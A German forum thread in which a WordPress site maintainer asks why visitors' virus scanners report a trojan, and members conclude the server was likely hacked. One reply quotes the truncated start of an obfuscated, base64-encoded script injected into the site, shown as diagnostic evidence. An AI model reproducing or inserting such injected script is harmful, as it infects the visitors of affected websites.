Hilfe! Webseitenbesucher melden Trojaner. Kann ich nicht nachvollziehen.

  • Hallo,

    habt ihr einen Tipp?

    Angeblich melden PC-Virenscanner beim Besuch einer von mir betreuten Seite, einen Trojaner-Befall (HEUR:Trojan.Script.Generic).

    Das kann ich nicht nachvollziehen, da ich nur mit MAC OS und Linux arbeite.

    Ich habe schon alle möglichen Online-Scanner auf die Seite angesetzt. Keine einziges Tool hat angeschlagen. Alle melden, dass es keine Probleme auf der Seite gibt.

    Auf der WP Installation selbst, laufen Wordfence und iThemes Security.

    Irgend jemand eine Idee, was man da machen kann?

    lg
    KC

    • Anzeige

    Hallo!

    Wenn du gerade an deiner Website arbeitest oder dein aktuelles Hosting überdenkst: Wir betreiben mit NetzLiving eine Hosting-Plattform, die speziell auf Performance, Sicherheit und einfache Verwaltung ausgelegt ist.

    • ✔️ Schnelle Ladezeiten (optimiert für WordPress & Co.)
    • ✔️ Deutsche Server & DSGVO-konform
    • ✔️ Persönlicher Support (kein 0815-Ticket-System)

    Mehr erfahren

  • Zwei "Security" Plugins gleichzeitig sind eher keine gute Idee, die kommen sich sicherlich hier und da in die Quere.

    Habe ich nur zum Testen gehabt. Normalerweise läuft nur iThemes-Security…

    Den (zunächst mal HTML-)Quellcode der Seite anschauen und das Problem identifizieren.

    Hmm, da kann ich auch nichts entdecken.

  • Dann wende Dich am besten an denjenigen, der den Website eingerichtet und etwas Ahnung von PHP usw. hat, der sollte dann die Beschreibung Deiner Besucher nachvollziehen können.

    Mehr kann man ohne Link zur Seite nicht sagen.

  • Dann wende Dich am besten an denjenigen, der den Website eingerichtet und etwas Ahnung von PHP usw. hat, der sollte dann die Beschreibung Deiner Besucher nachvollziehen können.

    Mehr kann man ohne Link zur Seite nicht sagen.

    Hier geht es zur Seite.

    Vielleicht seht ihr ja was…

    Die Seite ist so einfach gestrickt, ich kann da nichts ungewöhnliches entdecken…

  • Vermutlich liegt ein Hack vor. Ein externer Scanner meldet einige sehr verdächtige Daten, sehe diese Daten nicht direkt im Code hier bei mir, aber das heisst nichts, evtl. werden/wurden diese Daten nur unter bestimmten Umständen vom Server/Hack ausgeliefert, z.B. bestimmtes Betriebssystem, bestimmter Browser, Referer o.ä.

    Potentially Suspicious files: 10 -> Threat dump: View code, z.B.

    Zitat

    [[<script type='text/javascript' language='javascript' > var GFGCRMKCIZ = atob('dmFyIE5PREhURkNIQlEgPSBTdHJpbmcuZnJvbUNoYXJDb2RlKDE5IC0gOSwgMTI3IC0gOSwgMTAxIC0gNCwgMTIxIC0gNywg...

  • Vermutlich liegt ein Hack vor. Ein externer Scanner meldet einige sehr verdächtige Daten, sehe diese Daten nicht direkt im Code hier bei mir, aber das heisst nichts, evtl. werden/wurden diese Daten nur unter bestimmten Umständen vom Server/Hack ausgeliefert, z.B. bestimmtes Betriebssystem, bestimmter Browser, Referer o.ä.

    Potentially Suspicious files: 10 -> Threat dump: View code, z.B.

    Also wenn ich den Test auf der Seite durchführe, erhalte ich keine Meldung. Alles grün. "No Malware Detected By Free Online Website Scan On This Website."

  • Hier sieht es so aus:

    [ATTACH=CONFIG]18541[/ATTACH]

    Das bedeutet, dass es auf jeden Fall auf dem Server einen Hack gegeben hat. Ob/wann der ggf. vollständig oder unvollständig bereinigt wurde, oder ob der Hack in irgendeiner Form noch aktiv ist, kann man "von aussen" nicht feststellen, die Scan-Ergebnisse und v.a. die o.g. Meldungen Deiner Besucher lassen es allerdings vermuten...

    In der "WayBack Machine" kann man den im Screenshot sichtbaren Hack auch noch im HTML-Quelltext sehen, z.B. [FONT=courier new]view-source:https://web.archive.org/web/2017041621…inger.de/ueber/[/FONT]

    Einmal editiert, zuletzt von b3317133 (8. März 2018 um 14:56)

  • Hier sieht es so aus:

    [ATTACH=CONFIG]18541[/ATTACH]

    Das bedeutet, dass es auf jeden Fall auf dem Server einen Hack gegeben hat. Ob/wann der ggf. vollständig oder unvollständig bereinigt wurde, oder ob der Hack in irgendeiner Form noch aktiv ist, kann man "von aussen" nicht feststellen, die Scan-Ergebnisse und v.a. die o.g. Meldungen Deiner Besucher lassen es allerdings vermuten...

    In der "WayBack Machine" kann man den im Screenshot sichtbaren Hack auch noch im HTML-Quelltext sehen, z.B. [FONT=courier new]view-source:https://web.archive.org/web/2017041621…inger.de/ueber/[/FONT]

    Alles klar, vielen Dank für die Hilfe.

  • Vermutlich liegt ein Hack vor. Ein externer Scanner meldet einige sehr verdächtige Daten, sehe diese Daten nicht direkt im Code hier bei mir, aber das heisst nichts, evtl. werden/wurden diese Daten nur unter bestimmten Umständen vom Server/Hack ausgeliefert, z.B. bestimmtes Betriebssystem, bestimmter Browser, Referer o.ä.

    Potentially Suspicious files: 10 -> Threat dump: View code, z.B.

    Gibt es evt auch einen Onlinescanner der einem die betroffenen Dateien erzählt ?

Jetzt mitmachen!

Sie haben noch kein Benutzerkonto auf unserer Seite? Registrieren Sie sich kostenlos und nehmen Sie an unserer Community teil!